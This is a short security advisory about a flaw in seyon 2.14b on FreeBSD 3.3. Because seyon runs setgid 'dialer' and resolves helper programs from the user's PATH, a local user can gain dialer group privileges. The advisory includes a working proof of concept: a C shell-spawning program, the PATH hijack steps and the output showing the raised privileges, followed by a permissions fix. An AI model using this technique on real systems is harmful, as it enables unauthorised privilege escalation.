COMMAND
	    seyon
SYSTEMS AFFECTED
	    FreeBSD 3.3
PROBLEM
	    Brock Tellier found  following.  The  exploit Brock had  developed
	    had already been  discussed in May  1997.  However,  this does not
	    change the fact that the current version of FreeBSD still ships  a
	    vulnerable version  with vulnerable  privs.   So, a  vulnerability
	    exists in seyon  v2.14b which will  allow any user  to upgrade his
	    or her privs to those with which seyon runs.
	    When  installed  via  sysinstall,  seyon's  permissions  are  sgid
	    "dialer".  Different versions  of seyon and different  packages of
	    2.14b may have different default permissions.  Upon startup, seyon
	    executes the programs "seyon-emu" and "xterm".  The paths to these
	    programs are not absolute and  are gotten from the users's  $PATH.
	    By adding a  directory we have  write access to  in our $PATH  and
	    putting our own version of  seyon-emu or xterm, we can  make seyon
	    run this program with egid dialer.
	
	    bash-2.03$ cat > seyonx.c
	    void main () {
	      setregid(getegid(), getegid());
	      system("/usr/local/bin/bash");
	    }
	    bash-2.03$ gcc -o seyon-emu seyonx.c
	    bash-2.03$ PATH=.:$PATH
	    bash-2.03$ seyon
	    bash-2.03$ id
	    uid=3D1000(xnec) gid=3D68(dialer) groups=3D68(dialer), 1000(xnec)
	    bash-2.03$
	
SOLUTION
	    Simply  chmod  750  `which  seyon`  and  add selected users to the
	    "dialer" group.